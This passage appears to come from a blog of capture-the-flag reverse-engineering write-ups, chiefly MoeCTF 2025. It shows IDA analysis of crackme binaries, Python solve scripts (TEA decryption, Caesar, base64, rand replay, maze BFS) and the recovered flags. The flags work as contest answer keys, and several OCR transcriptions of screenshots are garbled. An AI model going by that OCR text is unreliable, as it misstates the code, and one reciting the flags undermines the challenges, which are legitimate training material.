b=bytes([(x+256)%256 for x in signed]) n=len(b) temp=bytearray(n) for j in range(n): temp[j]=b[(j-5)%n] e=bytearray(n) for i in range(n): val=((~temp[i])&amp;0xFF)^11 e[i]=(val-32)&amp;0xFF decoded=base64.b64decode(bytes(e)) print(decoded.decode('utf-8')) </code></pre> <p>flag{kotl1n_is_also_java}</p> <h1>5.test</h1> <p>IDA打开定位到main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-160.png" alt="" /></p> <p>查看字符串,可以看到用的是Glibc库</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-161.png" alt="" /></p> <p>种子设置在sub_10E0函数中,即12345</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-162.png" alt="" /></p> <p>最后会把我们输入的解密结果低位块与unk_4010对比,高位快与xmmword_401B对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-163.png" alt="" /></p> <p>脚本</p> <pre><code>Y = bytes([0x5A,0x66,0x86,0xCE,0x46,0x23,0x75,0x30,0x18,0x6F,0x5B, 0x7D,0x4D,0x4F,0xF7,0xC4,0x4A,0x0D,0x45,0xAE,0x36,0xEF, 0x6B,0x81,0xC1,0x82,0x03]) N, SEED = 27, 0x3039 def glibc_rand(seed): MOD31=2147483647; r=[0]*344; r[0]=seed &amp; 0xffffffff for i in range(1,31): r[i]=(16807*(r[i-1]&amp;0xffffffff))%MOD31; r[i]+=MOD31 if r[i]&lt;0 else 0 for i in range(31,34): r[i]=r[i-31] for i in range(34,344): r[i]=(r[i-3]+r[i-31])&amp;0xffffffff n=344 while True: x=(r[(n-3)%344]+r[(n-31)%344])&amp;0xffffffff; r[n%344]=x; n+=1 yield (x&gt;&gt;1)&amp;0x7fffffff def solve(y): rng=glibc_rand(SEED) swaps=[(next(rng)%N, next(rng)%N) for _ in range(256)] z=bytearray(y) for i in range(N): z[i]^=next(rng)&amp;0xFF for p,q in reversed(swaps): z[p],z[q]=z[q],z[p] return bytes(z) print(solve(Y).decode()) </code></pre> <p>flag{there_1s_s0_many_rand}</p> <h1>6.PlzdebugMe</h1> <p>IDA打开,shift+F12查看字段串,在sub_401697</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-164.png" alt="" /></p> <p>打开flag长度是32,会先进行格式检验,然后对输入进行加密,最后比对</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-165.png" alt="" /></p> <p>最重要的有三个数组</p> <ul> <li> <p>随机状态 : dword_415080 @ 0x415080 (LCG 状态,每步更新一次)。</p> </li> <li> <p>目标数组 : byte_410020 @ 0x410020 (32 字节,被用来和变换后的输入对比)。</p> </li> <li> <p>输入缓冲 : byte_415060 @ 0x415060 (你输入的原文存放处)。</p> </li> </ul> <p>最主要的是我们每次的dword的值每次会变</p> <p>种子设置:sub_401656函数,写入dword_415080</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-166.png" alt="" /></p> <p>迭代:sub_415080函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-167.png" alt="" /></p> <p>我们动态调试去拿dword_415080的初始值</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-168.png" alt="" /></p> <p>我通过输入一个长度为32的字符串flag{AAAAAAAAAAAAAAAAAAAAAAAAAA}</p> <p>dword_415080的初始值</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-169.png" alt="" /></p> <p>有了初始值,我们就可以按照sub_41656的逻辑计算每次异或的dword_415080</p> <p>比对的密文值byte_410020</p> <pre><code>data:00410020 byte_410020 db 5Bh, 50h, 0A1h, 25h, 84h, 8Eh, 61h, 0C4h, 6Bh, 0BBh, 0AEh, 5, 0Bh, 0C6h .data:00410020 ; DATA XREF: sub_401697+E8↑o .data:0041002E db 3Dh, 42h, 5Ah, 0FBh, 0C1h, 0C9h, 4Eh, 0E9h, 8Dh, 50h, 91h, 87h, 87h .data:0041003B db 24h, 0ADh, 0AFh, 0D5h, 36h </code></pre> <p>解题脚本</p> <pre><code>def recover_flag(): arr = [ 0x5B, 0x50, 0xA1, 0x25, 0x84, 0x8E, 0x61, 0xC4, 0x6B, 0xBB, 0xAE, 0x05, 0x0B, 0xC6, 0x3D, 0x42, 0x5A, 0xFB, 0xC1, 0xC9, 0x4E, 0xE9, 0x8D, 0x50, 0x91, 0x87, 0x87, 0x24, 0xAD, 0xAF, 0xD5, 0x36, ] state = 123456 out = [] for b in arr: state = (1103515245 * state + 12345) &amp; 0xFFFFFFFF key = ((state &gt;&gt; 16) &amp; 0xFF) out.append(b ^ key) return ''.join(map(chr, out)) if __name__ == "__main__": print(recover_flag()) </code></pre> <p>flag{Y0u_Kn0w_H0w_t0_D3bug!!!!!}</p> MoeCTF 2025 rehttps://blog-5w0.pages.dev/posts/moectf-2025-re/https://blog-5w0.pages.dev/posts/moectf-2025-re/MoeCTF 2025 Reverse WriteUpSat, 05 Jul 2025 00:00:00 GMT<h1>02 逆向工程入门指北</h1> <p>文件提示:</p> <p>&lt;font style="color:rgb(0,0,0);"&gt;现在,用 IDA 打开本题的附件,开始我们的第一个挑战吧! &lt;/font&gt;</p> <p>&lt;font style="color:rgb(0,0,0);"&gt;P.S. 附件使用C++编写,有很多正常人看不懂的东西,不过或许 shift+F12 能帮到你?&lt;/font&gt;</p> <p>&lt;!-- 这是一张图片,ocr 内容为:ME TO MOECTF 2025!\N 00000019 WELCOME RODATA: LET'S PLAY A GAME!\N 00000014 TRODATA: S IT 10 TIMES.\N I HAVE A SECRET NUMBER BETWEEN O AND 99, AND YOU CAN GUESS 00000049 .RODATA: IF YOU SUCCESSLY GUESSED IT, I WILL GIVE YOU THE FLAG! 00000037 .RODATA: PLEASE INPUT YOUR NUMBER: 0000001B C RODATA: INVALID INPUT 0000000E .RODATA: YOU ARE RIGHT!\N C 00000010 .RODATA: THE FLAG IS MOECTF(OPEN_YOUR_IDA_AND_START_REVERSE_ENGINEERING!!]. 00000043 C .RODATA: THAT'S NOT RIGHT... C 00000014 .RODATA: THANKS FOR YOUR PLAYING! C 00000019 .RODATA: BASIC_STRING::_M_CONSTRUCT NULL NOT VALID 0000002A .RODATA: C 0000001E TERMINATE CALLED RECURSIVELY\N C .RODATA: 0000000C C WHAT() --&gt; <img src="./images/img-01.png" alt="" /></p> <p>moectf{open_your_IDA_and_start_reverse_engineering!!}</p> <h1>03 base</h1> <p>IDA打开,找到main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:_FASTCALL MAIN(INT INT ARGC, CONST CHAR **ARGV, CONST CHAR **ENVP) FILE <em>V3; // RAX _INT64 V4;// RDX _INT64 V5;// RAX UNSIGNED__INT64 V6;// RAX CHAR</em>V7;//RBX INT V8;// EAX CHAR *V9;// RCX CHAR V11[16]; // [RSP+20H] [RBP-98H] BYREF CHAR BUFFER[112]; // [RSP+30H] BYREF [RBP-88H] SUB_140001010(FORMAT); SUB_140001010((CHAR *)&amp;BYTE_1400032F0); V3 三 _ACRT_IOB_FUNC(0); FGETS(BUFFER, 100, V3); 三 -1LL; V4 -1LL; V5 三 OP ++V5; WHILE ( BUFFER[V5] ); IF ( V5 &amp;&amp; V11[V5 + 15] 三 10 ) 丁 V6 三 V5 - 1; IF ( V6 &gt; 0X64 SUB_140001448(BUFFER); BUFFER[V6] O; OP ++V4; WHILE ( BUFFER[V4] ); V7 - (CHAR *)SUB_140001070(BUFFER, V4, V11); "BW91Y3RME1KWDV9DNG5FRZAWZF9BDF9CNDVINJQHIXO-"); V8 - STRCMP(V7, V9 : (CHAR )&amp;UNK_140003300; IF ( V8 )&amp;BYTE_140003318; V9 - (CHAR B_140001010(V9); _QNS FREE(V7); RETURN O; --&gt; <img src="./images/img-02.png" alt="" /></p> <p>查看sub_140001070函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:*A3 V6: CFADD (V6, 1LL); V7 三 V82V6 IF ( V7 V8 -1LL; RESULT : MALLOC(V8); V10 RESULT; IF ( RESULT IF ( A2 V11 - (UNSIGNED __INT8 *)(A1 + 2); V12 2 RESULT; V13 三 (A2 - 1) / 3 + 1; OP 1 _INT64)&amp;V11[~A1] &gt;: A2 ) IF ( (UNSIGNED V14 三 0; ELSE V14 三 *(V11 - 1); IF ( (UNSIGNED __INT64)&amp;V11[-A1] &gt;; A2 ) V15 ELSE *V11; V15 *(V11 2); V16 V11 +: 3; _INT64)V16 &gt;&gt; 2]; *V12 - AABCDEFGHIJKLMN[(UNSIGNED &gt;&gt; 4)) &amp; OX3F]; _INT8)(16 * V16) | (V14 &gt;&gt; 4) V12[1] - AABCDEFGHIJKLMN[(UNSIGNED _INT8)(4 * V14)) &amp; 0X3F]; | (UNSIGNED V12[2] - AABCDEFGHIJKLMN[(V15 ; AABCDEFGHIJKLMN[V15 &amp; OX3F]; V12[3] V12 +三 4;; - V13; WHILE ( V13 ); 子 V17 A2%3; IF ( V17 ) V17; V18 IF ( V17 !: 3 ) V19 - &amp;RESULT[*A3 - 1 - V18]; LOBYTE(V18) ; 61; MEMSET(V19 + 1, V18, 3 - V17); V10[*A3] : 0; RETURN V10; RETURN RESULT; --&gt; <img src="./images/img-03.png" alt="" /></p> <p>是一个 完全遵循Base64编码的标准算法流程</p> <p>使用strcmp函数,将 sub_140001070 返回的字符串v7与一个硬编码的字符串**"bW9lY3Rme1kwdV9DNG5fRzAwZF9BdF9CNDVlNjQhIX0="**进行比较。</p> <p>&lt;!-- 这是一张图片,ocr 内容为:BASE64在线编码解码 (最好用的BASE64在线工具) BASE64.US MD5 1 TIMESTAMP URLENCODE BASE64 请输入要进行BASE64编码或解码的字符 BW9IY3RME1KWDV9DNG5FRZAWZF9BDF9CNDVINIQHIXO三 编码(ENCODE) (编/解码快捷键: 解码(DECODE) ?交换 CTRL ENTER BASE64编码或解码的结果: 编码后自动全选 MOECTFLYOU_C4N_G00D_AT_B45E64!!Y --&gt; <img src="./images/img-04.png" alt="" /></p> <p>moectf{Y0u_C4n_G00d_At_B45e64!!}</p> <h1>10 A cup of tea</h1> <p>搜索main函数无果,shift6+F12搜索字符串</p> <p>&lt;!-- 这是一张图片,ocr 内容为:ADDRESS LENGTH TYPE STRING C ARGLIST ,RDATA:0. 00000009 C RDATA:0.. _ARGLIST 60000009 C .RDATA:0. 0000000A PLAINTEXT 0000000A C .RDATA:0. ENCRYPTED C BLOCK 00000006 .RDATA:0.. CONGRATULATIONS!!!! C 00000014 .RDATA:0.. C YOU ARE WRONG .RDATA:0. 00000010 STACK AROUND THE VARIABLE 0000001C C .RDATA:0.. C 00000011 RDATA:0.. WAS CORRUPTED. C 0000000F THE VARIABLE .RDATA:0.. IS BEING USED WITHOUT BEING INITIALIZED. C 0000002B .RDATA:0 C THE VALUE OF ESP RAS AOT PROPERJY SARED ACROSS A FUNCTION CALL. THIS IS USTALLY A RESULT OF CALLING A 000000DD .RDATA:0. 0000011D C A CAST T A CAST TO A SMALLER DATE TYPE HAS CAUSED MAST THE DATR. IF THIS NAS INTENTIONAL. YOU STOULD THE SOUR RDATA:0 STACK MEMORY WAS CORRUPTED\R\N C 0000001D .RDATA:0... L VARIABLE WAS USED BEFORE IT WAS INITIALIZED\R\N C 00000036 LOCAL RDATA:0 --&gt; <img src="./images/img-05.png" alt="" /></p> <p>我们看到主函数在sub_1400162E0里,继续点击</p> <p>&lt;!-- 这是一张图片,ocr 内容为: FOR ( I : 130LL; I; --I ) <em>(_DWORD</em>)V0 三 -858993460; V0+三4; SUB_140011384(&amp;UNK_140023015); V5[0] 289739801; V5[1] - 427884820; V5[2] 三 1363251608; V5[3] 269567252; V6[O] 2026214571; V6[1] 三 578894681; V6[2] 1193947460; V6[3] 三 229306230; V6[4] 三 73202484; V6[5] 三 961145356; V6[6]三 881456792; V6[7] 358205817; V6[8] 三5554069347; V6[9] : 1 119347883; V6[10]三0; MEMSET(V7,0, OX2CULL); MEMSET(V8,0, OX2CULL); SUB_1400111A4(&amp;UNK_14001AED0); _1400113ED(&amp;UNK_14001AEE4, STR); SUB J_STRLEN(STR); SIZE J_MEMCPY(V7, STR, SIZE); FOR(J-0;J&lt;5;+++++J) V12 - V7[2 * J]; 13 三 V7[2 * J + 1]; V13 SUB_14001109B(&amp;V12, V5); V8[2 * J] 三 V12; *1. J + 1] - V13; V8[2 V14 ; 1; FOR ( K 三 0; K &lt; 11;++K ) IF ( V8[K] ! V6[K] ) V14 0; SUB_1400111A4("YOU ARE WRONG!!"); BREAK; 了 IF ( V14 -: 1 ) SUB_1400111A4("CONGRATULATIONS!!!!"); SUB_140011320(V3, &amp;UNK_14001AE60); RETURN OLL; --&gt; <img src="./images/img-06.png" alt="" /></p> <p>v5是密钥,v6是数组,加密逻辑在sub_14001109B里</p> <p>&lt;!-- 这是一张图片,ocr 内容为:TACAI NEX FASTCALL SUB_1400117EO(UNSIGNED INT *A1, DWORD *A2) INT64 :64 RESULT; // RAX INT64 INT V3; // [RSP+24H] [RBP+4H] [RBP+24H] UNSIGNED INT V4; // [RSP+44H] D INT V5;// [RBP+44H] UNSIGNED [RSP+64H] INT I; // [RSP+A4H] [RBP+84H] SUB_140011384(&amp;UNK_140023015); V3 0; V4 三 *AL; V5 ; A1[1]; FOR ( I :0; I &lt; 32; ++I ) } V3 +: 1131796; V5) A (*A2 + 16 * V5); (V3 + + (A2[1] + (V5 &gt;&gt; 5)) V4 - 16 * V4); V5 +三 (A2[3] + (V4 &gt;&gt; 5)) V4) (V3 (A2[2] Y *. *A1 三 V4; RESULT 三 4LL; A1[1] ; V5; RETURN RESULT; --&gt; <img src="./images/img-07.png" alt="" /></p> <p>每一轮使用 <code>delta</code>(这里是 <code>1131796</code>)和 key 进行混淆 ,逆解密</p> <pre><code>from typing import List, Tuple DELTA = 1131796 # 0x114514 as seen in the binary (decimal 1131796) def u32(x: int) -&gt; int: return x &amp; 0xFFFFFFFF def tea_decrypt_block(v0: int, v1: int, k: List[int], rounds: int = 32) -&gt; Tuple[int, int]: v0 = u32(v0) v1 = u32(v1) k = [u32(x) for x in k] sum_ = u32(DELTA * rounds) for _ in range(rounds): v1 = u32(v1 - (((v0 &gt;&gt; 5) + k[3]) ^ (sum_ + v0) ^ ((v0 &lt;&lt; 4) + k[2]))) v0 = u32(v0 - (((v1 &gt;&gt; 5) + k[1]) ^ (sum_ + v1) ^ ((v1 &lt;&lt; 4) + k[0]))) sum_ = u32(sum_ - DELTA) return v0, v1 def tea_encrypt_block(v0: int, v1: int, k: List[int], rounds: int = 32) -&gt; Tuple[int, int]: v0 = u32(v0) v1 = u32(v1) k = [u32(x) for x in k] sum_ = 0 for _ in range(rounds): sum_ = u32(sum_ + DELTA) v0 = u32(v0 + (((v1 &gt;&gt; 5) + k[1]) ^ (sum_ + v1) ^ ((v1 &lt;&lt; 4) + k[0]))) v1 = u32(v1 + (((v0 &gt;&gt; 5) + k[3]) ^ (sum_ + v0) ^ ((v0 &lt;&lt; 4) + k[2]))) return v0, v1 def words_to_bytes_le(words: List[int]) -&gt; bytes: return b"".join(w.to_bytes(4, "little") for w in words) def main(): key = [289739801, 427884820, 1363251608, 269567252] v6 = [ 2026214571, 578894681, 1193947460, -229306230, 73202484, 961145356, -881456792, 358205817, -554069347, 119347883, 0, ] v6_u = [u32(x) for x in v6] ciphertext_words = v6_u[:10] plaintext_words = [] for i in range(0, len(ciphertext_words), 2): p0, p1 = tea_decrypt_block(ciphertext_words[i], ciphertext_words[i+1], key) plaintext_words.extend([p0, p1]) pt_bytes = words_to_bytes_le(plaintext_words) flag = pt_bytes.split(b"\x00", 1)[0].decode('utf-8', errors='replace') print("Recovered flag string:", flag) re_cipher_words = [] for i in range(0, len(plaintext_words), 2): c0, c1 = tea_encrypt_block(plaintext_words[i], plaintext_words[i+1], key) re_cipher_words.extend([c0, c1]) print("Verification success?", re_cipher_words == ciphertext_words) if __name__ == '__main__': main() </code></pre> <p>moectf{h3r3_4_cuP_0f_734_f0R_y0U!!!!!!}</p> <h1>11 ezpy</h1> <p>简单的pyc逆向</p> <p>通过命令</p> <pre><code>uncompyle6 ezpy.pyc &gt;ezpy.py </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为:(.VENV) PS C:\USERS\35159\PYCHARMPROJECTS\PYTHONPROJECT2&gt; ( UNCOMPYLE6 EZPY. PYC &gt;EZPY.PY --&gt; <img src="./images/img-08.png" alt="" /></p> <p>看到生成了ezpy.py</p> <p>&lt;!-- 这是一张图片,ocr 内容为:EZPY.PYC EZPY.PY --&gt; <img src="./images/img-09.png" alt="" /></p> <p>打开ezpy.py文件</p> <p>&lt;!-- 这是一张图片,ocr 内容为:F UNCOMPYLE6 VERSION 3.9.2 # PYTHON BYTECODE VERSION BASE 3.8.0(3413) # DECOMPILED FROM: PYTHON 3.8.10 (TAGS/V3.8.10:3D8993A, MAY 3 2021, 11:48:03) [MSC V1928 64 BIT (AMD64)] # EMBEDDED FILE NAME:EZPY.PY #COMPILED AT:2025-06-24 16:38:00 # SIZE OF SOURCE MOD 2**32:712 BYTES DEF CAESAR CIPHER ENCRYPT(TEXT,SHIFT): RESULT - FOR CHAR IN TEXT: IF CHAR.ISALPHAO: IF CHAR.ISLOWERO: NEW CHAR - CHR((ORD(CHAR) - ORD("A") + SHIFT) % 26 + ORD("A") ELSE: IF CHAR.ISUPPERO: W CHAR - CHR((ORD(CHAR) - ORD("A") + SHIFT) % 26 + ORD("A") NEW RESULT.APPEND(NEW CHAR) ELSE: RESULTAPPEND(CHAR) ELSE: RETURN ""JOIN(RESULT) USER INPUT - INPUT("PLEASE INPUT YOUR FLAG: ") A 1 IFA!1: PLAINTEXTUSERINPUT SHIFT 114514 KT CAESAR CIPHER ENCRYPT(PLAINTEXT,SHIFT) ENCRYPTED TEXT IF ENCRYPTED TEXT - "WYOMDPFLOE UXOG ZIM]": PRINT("CORRECT!!!!") # OKAY DECOMPILING EZPY.PYC --&gt; <img src="./images/img-10.png" alt="" /></p> <p>实际就是 shift = 10 的凯撒加密, 只要把目标字符串 只要把目标字符串 "wyomdp{I0e_Ux0G_zim}" 逆向 Caesar -10 就行。</p> <pre><code>def caesar_cipher_decrypt(text, shift): result = [] for char in text: if char.isalpha(): if char.islower(): new_char = chr((ord(char) - ord("a") - shift) % 26 + ord("a")) else: if char.isupper(): new_char = chr((ord(char) - ord("A") - shift) % 26 + ord("A")) result.append(new_char) else: result.append(char) return "".join(result) if __name__ == "__main__": encrypted = "wyomdp{I0e_Ux0G_zim}" shift = 114514 % 26 # 实际等效移位量 = 10 flag = caesar_cipher_decrypt(encrypted, shift) print("解密结果:", flag) </code></pre> <p>moectf{Y0u_Kn0W_pyc}</p> <h1>13 mazegame</h1> <p>IDA打开,定位到主函数,是一个迷宫, 需要找到从起始点 <code>**(1, 1)**</code> 到终点 <code>**(32, 15)**</code> 的一条有效路径</p> <p>&lt;!-- 这是一张图片,ocr 内容为:1LL; WHILE SWITCH ( V12[V5] ) 子 'A': CASE CASE --V4; -V8;; --V9; BREAK; CASE D' CASE 'D': ++V4; ++V8; ++V9; BREAK; 'S' CASE 'S CASE ++V6; ++V7; BREAK; CASE 'W': CASE 'W': --V6J - V7; BREAK; DEFAULT: SUB_140001020((CHAR *)&amp;BYTE_1400040CO); SUB_140001020((CHAR <em>)&amp;BYTE_140004210); GOTO LABEL_2; IF ( V7 &gt; 0X37 || V9 &gt; 0X37 ) :(CHAR</em>)&amp;UNK_1400040D8; V10 GOTO LABEL_20; IF ( BYTE_140005660[56 * V7 + V8] 三 49 ) V10 (CHAR *)&amp;UNK_1400040F8; GOTO LABEL_20; IF ( V7 - 15 &amp;&amp; V8 32 ) BREAK; IF ( ++V5 &gt;: (INT)V3 ) GOTO LABEL_19; SUB_140001020(ASC_1400041E0); SUB_140001020("MOECTF{%S}\N"); RETURN O; --&gt; <img src="./images/img-11.png" alt="" /></p> <p>迷宫地图在sub_1400010E0函数里</p> <p>&lt;!-- 这是一张图片,ocr 内容为::"1010000000000000001000001101110101111111111101011100000111"; V9[1] VE ; "111111111111111111111111111111111111111111111111111111111" V9[0] - "111 1111111111111111111"; V9[2] - "101110101111111110101011100000010000000000001000101111011"; "100000100000010000100010110111111111101110111011101110111"; V9[3] 三 "101111111110111011101110110101000000000010101000111000111"; V9[4] "10100000001000101000100011010101011111110111011101010111011"; V9[5] V9[6] "1010101011111101110111010110101010000010000000001010111011"; 三 V9{7] - "1010101000001010000010101011101011101011111111111111111011"; "101110101110101011111010101110010100000000101010101110111"; V9[8] [9]6] "1000001000101000100000010110011111111101010101011101110111" V9[10] "11111011101011111011111111101000100000101100101010011101111" 川 "100010100010001000100000010001010011000100100100100110000001" V9[11] 三 "10111010111110101010111011011001010111101010101011101011101" V9[12] "100010100010000010101010110001010100000000010101010101011101' V9[13] V9[14] "11101011101111111101110101111010111011111111101110101011101" 三 "100010000101000010100010110001000101010000010100101010111101": V9[15] "10111111101011101110111011011111111010111011101110111011101" V9[16] "10G V9[17] 100010000001000000000000100000000000010000000000001011001" V9[18] "11101011111011111111101010111010101111011111111110101011011" V9[19] "T0101000000000100100101011010101000000010010010101011011011" "101011111111110101010101011010111111111101010101010101011011" V9[20] "T01000000000000100010101101101000000000010001010101011011" V9[21] "1011111111111111111011101101111111111111111111011101011011"" V9[22] "10000000000111000000000000111101010100011110001111111011011"; V9[23] "1110111110000001101101111111101011011101110110110001011011"; V9[24] "1110111111111111101101111111111101110111101101100001011011"; V9[25] "1000100011111100001000000111110101110111011101100001011011011"; V9[26] "1011101010111111101011101111011101010001111011000001010011" V9[27] "1000000100000100001000101011111111111111111101100001010101011" V9[28] "10111111111011101110111011110001000110001101101100001010001" V9[29] V9[30] "10100000001000101000100011110111011101111110110000101011101 V9[31] "101010111111101110111010101110001000101111101100000101011101" V9[32] "1010101000000101000001010111111010111011111101100000101011101" "10111010111010101011101010111000100011000110110000101011101" V9[33] V9[34] "100000100010101010000001011111111111111111110110000101011101" "11111011101010111101111110000000000000000110110000001011101" V9[35] "100010100010001000100000011111111111111111100110011011101" V9[36] 三 "1011101011111010101010101001000000000111111100011111011101" V9[37] 三 V9[38] "100010100010000010100010101101110000001111110100101010101" V9[39] - "111010111011111110111010001100110011111111100110111011101"; 三 11 D] - "1000100010100000101000101011111111111111111111110111010001"; V9[40] V1 - (CONST CHAR **)V9; V9(55] - "11111111111111111111111111111111111111111111111111111111111"; --&gt; <img src="./images/img-12.png" alt="" /></p> <p>提取出,并按顺序排好</p> <pre><code>11111111111111111111111111111111111111111111111111111111 10100000000000000010000011011101011111111101011100000111 10111010111111111010111011000001000001000001000101110111 10000010000010000010001011011111111101110111011101110111 10111111111011101110111011010000000000010100010001110111 10100000001000101000100011010101111111011101110101110111 10101011111110111011101011010101000001000000010101110111 10101010000010100000101011110101110101111101111111110111 10111010111010101111101011100101000100000101000101110111 10000010001010001000001011001111011111010101011101110111 11111011101011111011111111101000100000101100101001110111 10001010001000100010000010001010011000100010010011000001 10111010111110101010111011011001011111010101011101011101 10001010001000001010001011000101000100000101000101011101 11101011101111111011101011110101110111111101110101011101 10001000101000001010001011000100010100000101000101011101 10111111101011101110111011011111110101110111011101011101 10001000001000100000001011000100000100010000000101011001 11101011111011111111101011110101111101111111110101011011 10101000000010001000101011010100000001000100010101011011 10101111111110101010101011010111111111010101010101011011 10100000000000100010101011010000000000010001010101011011 10111111111111111110111011011111111111111111011101011011 10000000001111000000000011110111010000111100011111011011 11101111100000011011011111111010110111011101100001011011 11101111111111111011011111111101110111101101100001011011 10001000111111000010000011111010110111011101100001011011 10111010111111111010111011110111010000111101100001010011 10000010000010000010001011111111111111111101100001010111 10111111111011101110111011110001000110001101100001010001 10100000001000101000100011110111011101111101100001011101 10101011111110111011101011110001000101111101100001011101 10101010000010100000101011111101011101111101100001011101 10111010111010101111101011110001000110001101100001011101 10000010001010101000001011111111111111111101100001011101 11111011101011111011111110000000000000001101100001011101 10001010001000100010000011111111111111111100110011011101 10111010111110101010111010010000000011111110001111011101 10001010001000001010001010110111000001111110100101011101 11101011101111111011101000110011001111111100110111011101 10001000101000001010001011111111111111111111110111010001 10111111101011101110111010100001001100000000000011011011 10001000001000100000001011111111111101011101111001011011 10101011111011111111101011000000000001000100010111011011 10101000000010001000101010010111111111111111111111011011 10101111111110101010101010110111111111111111111101011011 10100000000000100010101011100000000000000000000011011011 10111111111111111110011011111111111111111111111011011011 10000011111111111111000010000000000000000000000000011001 11111011111111111111111111111111111111111111111111111101 11111011100001100110110111000000000000000000000111111101 11111011101111011010000111011111111111111111110111111101 11111011100001000010110110000111111111111111110000000001 11111011101111011010110111101111111111111111111111111111 11110000000000011000110000000000000000000000000000000011 11111111111111111111111111111111111111111111111111111111 </code></pre> <p>用BFS算法寻路</p> <pre><code>from collections import deque def find_maze_path(maze, start, end): # maze: 56x56的迷宫地图('0'和'1'的二维列表) # start: 起点坐标 (x, y) # end: 终点坐标 (x, y) rows = len(maze) cols = len(maze[0]) # 移动方向:上、下、左、右 directions = [(-1, 0), (1, 0), (0, -1), (0, 1)] # (dx, dy) # 队列用于BFS queue = deque([start]) # 集合用于记录已访问的节点 visited = {start} # 字典用于回溯路径 parent = {start: None} while queue: current_x, current_y = queue.popleft() current_node = (current_x, current_y) # 检查是否到达终点 if current_node == end: return reconstruct_path(parent, start, end) # 探索所有可能的移动方向 for dx, dy in directions: next_x, next_y = current_x + dx, current_y + dy next_node = (next_x, next_y) # 检查移动是否有效 if 0 &lt;= next_x &lt; cols and 0 &lt;= next_y &lt; rows and \ maze[next_y][next_x] == '0' and next_node not in visited: visited.add(next_node) queue.append(next_node) parent[next_node] = current_node return None def reconstruct_path(parent_map, start, end): path = [] current = end while current: path.append(current) current = parent_map[current] path.reverse() instructions = [] for i in range(len(path) - 1): x1, y1 = path[i] x2, y2 = path[i+1] if x2 &gt; x1: instructions.append('D') elif x2 &lt; x1: instructions.append('A') elif y2 &gt; y1: instructions.append('S') elif y2 &lt; y1: instructions.append('W') return "".join(instructions) maze_map_strings = [ "11111111111111111111111111111111111111111111111111111111", "10100000000000000010000011011101011111111101011100000111", "10111010111111111010111011000001000001000001000101110111", "10000010000010000010001011011111111101110111011101110111", "10111111111011101110111011010000000000010100010001110111", "10100000001000101000100011010101111111011101110101110111", "10101011111110111011101011010101000001000000010101110111", "10101010000010100000101011110101110101111101111111110111", "10111010111010101111101011100101000100000101000101110111", "10000010001010001000001011001111011111010101011101110111", "11111011101011111011111111101000100000101100101001110111", "10001010001000100010000010001010011000100010010011000001", "10111010111110101010111011011001011111010101011101011101", "10001010001000001010001011000101000100000101000101011101", "11101011101111111011101011110101110111111101110101011101", "10001000101000001010001011000100010100000101000101011101", "10111111101011101110111011011111110101110111011101011101", "10001000001000100000001011000100000100010000000101011001", "11101011111011111111101011110101111101111111110101011011", "10101000000010001000101011010100000001000100010101011011", "10101111111110101010101011010111111111010101010101011011", "10100000000000100010101011010000000000010001010101011011", "10111111111111111110111011011111111111111111011101011011", "10000000001111000000000011110111010000111100011111011011", "11101111100000011011011111111010110111011101100001011011", "11101111111111111011011111111101110111101101100001011011", "10001000111111000010000011111010110111011101100001011011", "10111010111111111010111011110111010000111101100001010011", "10000010000010000010001011111111111111111101100001010111", "10111111111011101110111011110001000110001101100001010001", "10100000001000101000100011110111011101111101100001011101", "10101011111110111011101011110001000101111101100001011101", "10101010000010100000101011111101011101111101100001011101", "10111010111010101111101011110001000110001101100001011101", "10000010001010101000001011111111111111111101100001011101", "11111011101011111011111110000000000000001101100001011101", "10001010001000100010000011111111111111111100110011011101", "10111010111110101010111010010000000011111110001111011101", "10001010001000001010001010110111000001111110100101011101", "11101011101111111011101000110011001111111100110111011101", "10001000101000001010001011111111111111111111110111010001", "10111111101011101110111010100001001100000000000011011011", "10001000001000100000001011111111111101011101111001011011", "10101011111011111111101011000000000001000100010111011011", "10101000000010001000101010010111111111111111111111011011", "10101111111110101010101010110111111111111111111101011011", "10100000000000100010101011100000000000000000000011011011", "10111111111111111110011011111111111111111111111011011011", "10000011111111111111000010000000000000000000000000011001", "11111011111111111111111111111111111111111111111111111101", "11111011100001100110110111000000000000000000000111111101", "11111011101111011010000111011111111111111111110111111101", "11111011100001000010110110000111111111111111110000000001", "11111011101111011010110111101111111111111111111111111111", "11110000000000011000110000000000000000000000000000000011", "11111111111111111111111111111111111111111111111111111111", ] maze_map = [list(row) for row in maze_map_strings] start_point = (1, 1) end_point = (32, 15) path_instructions = find_maze_path(maze_map, start_point, end_point) if path_instructions: print("找到了路径!") print(path_instructions) else: print("没有找到路径。") </code></pre> 